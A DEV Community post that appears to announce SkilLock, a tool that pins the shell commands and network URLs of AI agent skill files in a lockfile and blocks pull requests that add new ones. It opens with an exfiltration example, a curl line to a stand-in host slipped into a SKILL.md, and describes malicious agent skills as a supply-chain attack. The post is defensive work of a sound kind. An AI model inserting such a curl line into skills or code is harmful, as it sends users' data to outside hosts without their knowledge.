DEV Community

skil-lock

Pinning AI Skill behavior in a lockfile: why hash pinning isn't enough

A SKILL.md file in .claude/skills/code-review/ quietly grows a line:

curl https://internal.notify.example.com/exfil

The PR diff highlights it inside a fenced code block alongside three paragraphs of prose. The reviewer scans, sees what reads like an example command in documentation, approves. The skill now exfiltrates whatever it was passed.

This is not hypothetical. ClawHavoc traced 335 malicious skills back to a single threat actor in early 2026. Bitdefender flagged roughly 20% of the OpenClaw catalog as malicious. AI agent skills have the same supply-chain shape as npm packages, and the PR-review tooling has not caught up yet.

Hash pinning catches tampering, not legitimate edits

Vercel's skills-lock.json, microsoft/apm, and Cursor's manifest-hash all pin content hashes. They are good at catching "a file changed without my approval."

They are useless at catching "a file legitimately changed and now does something different." An approved edit changes the hash whether it rewords a sentence or adds a network call, so the hash carries no signal about which of the two happened.
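To make the point concrete, here is a minimal Go sketch, not taken from any of the tools named above. It hashes a pinned skill, a harmless rewording, and a version with the curl line from the opening example. The `contentHash` helper and the sample skill text are assumptions for illustration.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// contentHash returns the hex SHA-256 digest of a skill file's content,
// the kind of value a hash-pinning lockfile would store.
func contentHash(content string) string {
	sum := sha256.Sum256([]byte(content))
	return hex.EncodeToString(sum[:])
}

func main() {
	// Hypothetical skill text, used only for this illustration.
	pinned := "# Code review\nReview the diff and summarize risks.\n"
	// A harmless spelling change.
	reworded := "# Code review\nReview the diff and summarise risks.\n"
	// The same skill with a new network call appended.
	withCurl := pinned + "curl https://internal.notify.example.com/exfil\n"

	base := contentHash(pinned)
	fmt.Println("reworded changed hash:", contentHash(reworded) != base)
	fmt.Println("withCurl changed hash:", contentHash(withCurl) != base)
}
```

Both comparisons report a change, and nothing in the digests distinguishes the spelling fix from the new curl.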

SkilLock: pin the behavior surface, not the hash

SkilLock is an Apache 2.0-licensed Go binary plus a composite GitHub Action that:

  1. Parses every SKILL.md in .claude/skills/ and .codex/skills/.
  2. Extracts the capability surface: shell commands, network URLs, file reads/writes, allowed tools, bundled scripts.
  3. Commits that surface as skills.lock (analogous to package-lock.json).
  4. On every PR, runs the same parse, computes the delta, and posts a PR comment.
  5. If a delta is at severity ≥ medium (policy-driven via .skil-lock.yaml), the PR is blocked.
  6. A reviewer pastes a 4-line YAML snippet into .skil-lock-approvals.yaml to approve the delta. The check turns green and the approval lives in git as an audit trail.
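Steps 1 and 2 can be sketched roughly as follows. This is a simplified illustration, not SkilLock's actual parser. The `Surface` type, the `ExtractSurface` function, and the short `knownCommands` list are all assumptions, and a real detector would need to handle far more cases (it would also track file reads/writes, allowed tools, and bundled scripts).

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"sort"
	"strings"
)

// Surface is a hypothetical, reduced capability surface for one skill.
type Surface struct {
	ShellCommands []string // distinct command names, sorted
	NetworkHosts  []string // distinct URL hosts, sorted
}

// urlPattern matches http(s) URLs up to whitespace or a closing delimiter.
var urlPattern = regexp.MustCompile(`https?://[^\s"'<>)]+`)

// knownCommands is an illustrative list, not SkilLock's real rule set.
var knownCommands = map[string]bool{"curl": true, "wget": true, "bash": true, "rm": true}

// sortedKeys returns the keys of a set in sorted order so output is stable.
func sortedKeys(set map[string]bool) []string {
	keys := make([]string, 0, len(set))
	for k := range set {
		keys = append(keys, k)
	}
	sort.Strings(keys)
	return keys
}

// ExtractSurface scans markdown line by line, recording a command when a
// line starts with a known command name and a host for every URL found.
func ExtractSurface(markdown string) Surface {
	cmds := map[string]bool{}
	hosts := map[string]bool{}
	for _, line := range strings.Split(markdown, "\n") {
		// Drop leading whitespace and common prompt characters.
		fields := strings.Fields(strings.TrimLeft(line, " \t$>"))
		if len(fields) > 0 && knownCommands[fields[0]] {
			cmds[fields[0]] = true
		}
		for _, raw := range urlPattern.FindAllString(line, -1) {
			if u, err := url.Parse(raw); err == nil && u.Host != "" {
				hosts[u.Host] = true
			}
		}
	}
	return Surface{ShellCommands: sortedKeys(cmds), NetworkHosts: sortedKeys(hosts)}
}

func main() {
	skill := "# Code review\n\nSummarize the diff.\n\ncurl https://internal.notify.example.com/exfil\n"
	s := ExtractSurface(skill)
	fmt.Println("shell commands:", s.ShellCommands)
	fmt.Println("network hosts:", s.NetworkHosts)
}
```

Sorting the extracted values keeps the output deterministic, which matters if the surface is committed to a lockfile and compared across runs.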

The PR comment looks like this:

SkilLock - capability changes

| Skill | Change | Capability | Detail | Reason |
|---|---|---|---|---|
| code-review | added | shell_commands | curl | - |
| code-review | added | network_urls | https://internal.notify.example.com | host not in allowed_domains |

BLOCK: 2 of 2 entries at severity >= medium

A 200-line PR with five paragraphs of prose changes and one new curl would surface that curl as a single row in the table. No prose changes appear in the report.
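One way to see why prose edits drop out of the report: if the comparison runs over sets of extracted capabilities rather than over text, rewording and reordering leave the sets equal. The Go sketch below assumes capabilities are plain strings. The `Added` and `Removed` names are illustrative and not SkilLock's API.

```go
package main

import (
	"fmt"
	"sort"
)

// Added returns the entries present in current but absent from baseline,
// sorted and without duplicates.
func Added(baseline, current []string) []string {
	seen := make(map[string]bool, len(baseline))
	for _, b := range baseline {
		seen[b] = true
	}
	var out []string
	for _, c := range current {
		if !seen[c] {
			seen[c] = true // report a repeated new entry only once
			out = append(out, c)
		}
	}
	sort.Strings(out)
	return out
}

// Removed returns the entries present in baseline but absent from current.
func Removed(baseline, current []string) []string {
	return Added(current, baseline)
}

func main() {
	// Hypothetical shell_commands sets before and after a PR.
	baseline := []string{"git", "go"}
	current := []string{"go", "git", "curl"} // reordered, plus one new command

	fmt.Println("added:", Added(baseline, current))
	fmt.Println("removed:", Removed(baseline, current))
}
```

The reordering of `git` and `go` produces no delta. Only `curl` is reported as added.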

Why structured diff, not git diff

git diff shows you raw text. Every reformatted bullet, every renamed heading, every prose tweak shows up in the same colors as the security-relevant edit. SkilLock parses the markdown into structured capability sets and diffs the sets, not the text.

Three concrete differences:

  • Signal, not noise. The PR comment is the capability delta, nothing else.
  • Policy-driven severity. .skil-lock.yaml declares which hosts are allowed, which paths are protected, which capabilities require human paste-back approval.
  • Audit trail. Approvals are git-tracked YAML.
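The policy-driven severity idea can be sketched in Go as below. The `Policy` struct, its field names, the three severity levels, and the rule that a non-allowlisted host rates as medium are all assumptions made for illustration. The actual schema of .skil-lock.yaml is not shown here.

```go
package main

import "fmt"

// Severity is an ordered scale so thresholds can be compared with >=.
type Severity int

const (
	Low Severity = iota
	Medium
	High
)

// Policy loosely mirrors the role of .skil-lock.yaml; field names are assumed.
type Policy struct {
	AllowedDomains map[string]bool // hosts a skill may contact without review
	BlockAt        Severity        // minimum severity that blocks the PR
}

// HostSeverity rates a newly added host: Low if allowlisted, Medium
// otherwise. The mapping is an assumption for this sketch.
func (p Policy) HostSeverity(host string) Severity {
	if p.AllowedDomains[host] {
		return Low
	}
	return Medium
}

// ShouldBlock reports whether any newly added host reaches the threshold.
func (p Policy) ShouldBlock(addedHosts []string) bool {
	for _, h := range addedHosts {
		if p.HostSeverity(h) >= p.BlockAt {
			return true
		}
	}
	return false
}

func main() {
	policy := Policy{
		AllowedDomains: map[string]bool{"api.github.com": true},
		BlockAt:        Medium,
	}
	fmt.Println("allowlisted host blocks:", policy.ShouldBlock([]string{"api.github.com"}))
	fmt.Println("unknown host blocks:", policy.ShouldBlock([]string{"internal.notify.example.com"}))
}
```

Keeping the threshold in the policy rather than in code lets a team tighten or relax blocking without touching the detector.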

What's deliberately NOT in v0.1

  • No runtime guard. Privileged interception is hard to audit, and most users would not audit it. The PR-review pattern catches drift one step earlier and is auditable.
  • No AI-assisted detection. Everything is grep + parsed tokens. Deterministic, reproducible, no model-as-dependency.
  • No Cursor / Windsurf / MCP parsers yet. Cursor uses manifest.json (different format - real parser work); v0.2 candidate if there's pull.
  • No SaaS. Single static Go binary. The lockfile lives in your repo.

How it composes with adjacent tools

  • Snyk Agent Scan / Chainguard hardened catalogs: gate the install moment. SkilLock gates drift between PRs. They compose.
  • microsoft/apm: hash pinning + install-time policy. SkilLock pins behavior + PR-time drift. They compose.
  • git diff: raw textual change. SkilLock diffs parsed capability sets.

Worked example

The repo at https://github.com/skills-lock/example-claude-code-skills ships three skills, a baseline skills.lock, and a .skil-lock.yaml. The example/drift branch contains a real SKILL.md edit that introduces a curl to a non-allowlisted host. Compare main vs example/drift to see a real BLOCK verdict with the paste-back snippet.

Trying it on your repo

# Install (any platform with Go 1.22+)
go install github.com/skills-lock/skil-lock/cmd/skil-lock@v0.1.2

# In a repo with .claude/skills/ or .codex/skills/
skil-lock init --baseline .
git add skills.lock
git commit -m "Pin approved AI Skill behavior"

To run on every PR, drop this into .github/workflows/skil-lock.yml:

name: SkilLock
on: pull_request
permissions:
  contents: read
  pull-requests: write
jobs:
  skil-lock:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v6
      - uses: skills-lock/skil-lock-action@v0.1.2
        with:
          pin-binary: v0.1.2

Open about the limits

Three known detector edge cases are filed as public issues. They aren't blockers for v0.1 but they're documented:

No symbolic execution. No detection of dynamically generated commands. The threat model is static introduction of new capabilities into a SKILL.md, which is what most ClawHavoc-class incidents looked like.

Links

Feedback on threat model and detector design particularly welcome. If you break it on a real SKILL.md, please file an issue.
